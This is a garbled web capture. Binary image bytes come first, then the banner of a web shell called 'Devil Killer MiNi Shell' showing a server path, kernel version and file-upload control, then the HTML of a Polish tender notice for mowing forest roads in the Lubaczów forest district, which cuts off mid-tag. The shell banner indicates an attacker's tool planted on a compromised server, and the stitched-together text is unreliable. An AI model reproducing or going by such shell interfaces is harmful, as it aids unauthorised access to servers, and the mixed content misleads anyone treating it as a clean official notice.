JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221021/0040461801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Koszenie i wycięcie zakrzaczeń przy drogach leśnych w Nadleśnictwie Lubaczów w 2022 roku.” – II postępowanie przetargowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO LUBACZÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650016495</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubaczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lubaczow@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lubaczow.krosno.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Koszenie i wycięcie zakrzaczeń przy drogach leśnych w Nadleśnictwie Lubaczów w 2022 roku.” – II postępowanie przetargowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6ab91d6e-5130-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00404618</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_lubaczow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_lubaczow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w niniejszym postępowaniu, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa<br/>się przy użyciu środków komunikacji elektronicznej.<br/>2. Komunikacja ustna jest niedopuszczalna.<br/>3. Komunikacja między Zamawiającym, a Wykonawcami w niniejszym postępowaniu odbywa<br/>się przy użyciu platformy zakupowej Open Nexus – www.platformazakupowa.pl (dalej:<br/>„Platforma”): https://platformazakupowa.pl/pn/lasy_lubaczow<br/>4. Wymagania techniczne i organizacyjne dotyczące w szczególności logowania, składania<br/>ofert, składania wniosków o wyjaśnienie treści SWZ, wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz innych informacji<br/>przekazywanych przy ich użyciu opisane zostały w Instrukcji korzystania z Platformy<br/>https://platformazakupowa.pl/strona/45-instrukcje, w zakładce „Instrukcje dla<br/>Wykonawców” oraz w Regulaminie korzystania z Platformy, dostępnym pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia<br/>publicznego akceptuje warunki korzystania z Platformy określone w Regulaminie<br/>zamieszczonym na stronie internetowej pod wskazanym wyżej linkiem, w zakładce<br/>„Regulamin” oraz uznaje go za wiążący, a ponadto powinien zapoznać się z Instrukcją<br/>składania ofert/wniosków dostępną pod wskazanym wyżej linkiem, i stosować do niej.<br/>5. Limit objętości plików lub spakowanych folderów w zakresie całej oferty, oświadczenia<br/>o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, a także innych<br/>oświadczeń lub dokumentów składanych wraz z ofertą wynosi 10 plików lub spakowanych<br/>folderów (pliki można skompresować zgodnie z ust. 9), przy maksymalnej wielkości<br/>pojedynczego pliku 150 MB. Podczas komunikacji wielkość pliku to maksymalnie 500 MB.<br/>6. Za datę złożenia oferty, oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu, a także innych oświadczeń lub dokumentów składanych wraz z<br/>ofertą przyjmuje się datę ich złożenia na Platformie<br/>https://platformazakupowa.pl/pn/lasy_lubaczow Za datę przekazania wniosków,zawiadomień, dokumentów, oświadczeń lub ich kopii oraz innych informacji przyjmuje się<br/>datę ich złożenia na Platformie https://platformazakupowa.pl/pn/lasy_lubaczow<br/>7. Zamawiający, zgodnie z § 11 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz.<br/>2452), niniejszym określa wymagania techniczne umożliwiające korzystanie<br/>z udostępnianej przez Zamawiającego Platformy<br/>https://platformazakupowa.pl/pn/lasy_lubaczow, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,<br/>procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS<br/>Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer<br/>minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie<br/>UTF8,<br/>7) oznaczenie czasu odbioru danych przez Platformę zakupową stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany według czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Ofertę oraz oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu, składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">21.1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych<br/>osobowych)(Dz. Urz. UE L 119, str. 1 ze zm. – dalej „RODO”) Zamawiający informuje, iż<br/>administratorem danych osobowych jest Nadleśnictwo Lubaczów, ul. Słowackiego 20, 37-<br/>600 Lubaczów<br/>21.2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o<br/>udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich<br/>bezprawnym rozpowszechnianiem.<br/>21.3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP,<br/>do upływu terminu do ich wniesienia.<br/>21.4. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego<br/>oraz jego rozstrzygnięciem, jak również, po wybraniu Wykonawcy – na podstawie art. 6 ust.<br/>1 lit. b RODO w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji,<br/>a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>21.5. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o art. 18 – 19 oraz 74 – 76 PZP.<br/>21.6. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres<br/>obowiązywania umowy w sprawie zamówienia publicznego.<br/>21.7. Niezależnie od postanowień pkt 1.6. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu<br/>przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>21.8. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia mogą zostać przekazane podmiotom przetwarzającym dane<br/>w imieniu administratora danych osobowych np. podmiotom świadczącym usługi doradcze,<br/>w tym usługi prawne, i konsultingowe, firmom zapewniającym niszczenie materiałów itp.<br/>21.9. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą<br/>podejmowane w sposób zautomatyzowany, w tym również w formie profilowania.<br/>Pozostałe wymagania zostały opisane w pkt 21 SWZ do niniejszego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.67.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> nie przekraczającej 1 szt na m2, na poboczach i skaprach przy drogach leśnych (obustronnie)<br/>na łącznej długości dróg ok. 15,12 km, w tym wykaszanie i wycięcie zakrzaczeń ( z przewagą<br/>prac ręcznych ok. 60%), o grubości pow. 5 cm w skupiskach pow 5 szt na m2, na<br/>przeciwskarpach rowów przy drogach leśnych (obustronnie) oraz na szerokość około 0,5 m<br/>za skarpą od strony ściany lasu na łącznej długości dróg ok. 11,69 km. Złożenie pozyskanego<br/>materiału w pryzmach na miejsce wskazane przez leśniczego na odległość do 100 m, lub<br/>odrzucenie do lasu w porozumieniu z miejscowym leśniczym. Obkoszenie rogatek i barierek<br/>przy drogach. Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie<br/>spowoduje niekorzystnego wpływu na jakość wykonywanych prac. Sprzęt do koszenia trawy<br/>i niszczenia chwastów. Wykonawca posiada lub ma zapewniony dostęp do niżej podanych,<br/>w pełni sprawnych jednostek sprzętu: kosiarka bijakowa na wysięgniku wraz z ciągnikiem lub<br/>Unimogiem do koszenia dużych powierzchni oraz do koszenia na skarpach i przeciwskarpach<br/>– min. 1 szt.; kosiarki ręczne żyłkowe, spalinowe lub elektryczne do koszenia w miejscach<br/>niedostępnych takich jak: wokół drzewa, pod barierami, przy ogrodzeniach, znakach,<br/>pachołkach oraz innych urządzeniach drogowych – min. 1 szt, piła spalinowa ręczna - min. 1<br/>szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia<br/>podstawowego, zamówienia polegającego na powtórzeniu podobnych usług zgodnych z<br/>przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy<br/>Pzp – o wartości do 40% szacunkowej wartości zamówienia podstawowego.<br/>2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w<br/>przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, stanowiących<br/>przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań<br/>gospodarczych lub publicznych.<br/>3. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu<br/>odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z<br/>wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający kierować się będzie<br/>następującymi kryteriami:<br/>– Cena – 100%<br/>2. W ramach każdego z powyższych kryteriów można otrzymać maksymalnie 100 pkt, co po<br/>przeliczeniu przez odpowiednia wagę procentową oznacza, że w kryterium „Cena” można<br/>otrzymać maksymalnie 100 pkt.<br/>3. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Ocena ofert będzie się<br/>odbywać według zasad opisanych w ust. 4 poniżej.<br/>4. Oferty będą oceniane wg następującego wzoru:<br/>1) W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty.<br/>Ocena ofert w tym kryterium zostanie dokonana przy zastosowaniu poniższego wzoru:<br/>Cmin<br/>C = ------------------ x 100 pkt x 100%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”<br/>Cmin - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>5. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów<br/>wyliczoną zgodnie ze wzorem:<br/>O = C<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>6. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7. Suma punktów uzyskanych za kryterium ceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykaszanie oraz wycięcie zakrzaczeń (prace mechaniczne) , o grubości do. 5 cm w ilości<br/>nie przekraczającej 1 szt na m2, na poboczach i skaprach przy drogach leśnych (obustronnie)<br/>na łącznej długości dróg ok. 20,25 km, w tym wykaszanie i wycięcie zakrzaczeń ( z przewagą<br/>prac ręcznych średnio ok. 35%), o grubości pow. 5 cm w skupiskach pow 5 szt na m2, na<br/>przeciwskarpach rowów przy drogach leśnych (obustronnie) oraz na szerokość około 0,5 m<br/>za skarpą od strony ściany lasu na łącznej długości dróg ok. 9,17 km. Złożenie pozyskanego<br/>materiału w pryzmach na miejsce wskazane przez leśniczego na odległość do 100 m, lub<br/>odrzucenie do lasu w porozumieniu z miejscowym leśniczym. Obkoszenie rogatek i barierek<br/>przy drogach. Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie<br/>spowoduje niekorzystnego wpływu na jakość wykonywanych prac. Sprzęt do koszenia trawy<br/>i niszczenia chwastów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia<br/>podstawowego, zamówienia polegającego na powtórzeniu podobnych usług zgodnych z<br/>przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy<br/>Pzp – o wartości do 40% szacunkowej wartości zamówienia podstawowego.<br/>2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w<br/>przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, stanowiących<br/>przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań<br/>gospodarczych lub publicznych.<br/>3. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający kierować się będzie<br/>następującymi kryteriami:<br/>– Cena – 100%<br/>2. W ramach każdego z powyższych kryteriów można otrzymać maksymalnie 100 pkt, co po<br/>przeliczeniu przez odpowiednia wagę procentową oznacza, że w kryterium „Cena” można<br/>otrzymać maksymalnie 100 pkt.<br/>3. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Ocena ofert będzie się<br/>odbywać według zasad opisanych w ust. 4 poniżej.<br/>4. Oferty będą oceniane wg następującego wzoru:<br/>1) W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty.<br/>Ocena ofert w tym kryterium zostanie dokonana przy zastosowaniu poniższego wzoru:<br/>Cmin<br/>C = ------------------ x 100 pkt x 100%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”<br/>Cmin - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>5. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów<br/>wyliczoną zgodnie ze wzorem:<br/>O = C<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>6. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7. Suma punktów uzyskanych za kryterium ceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p 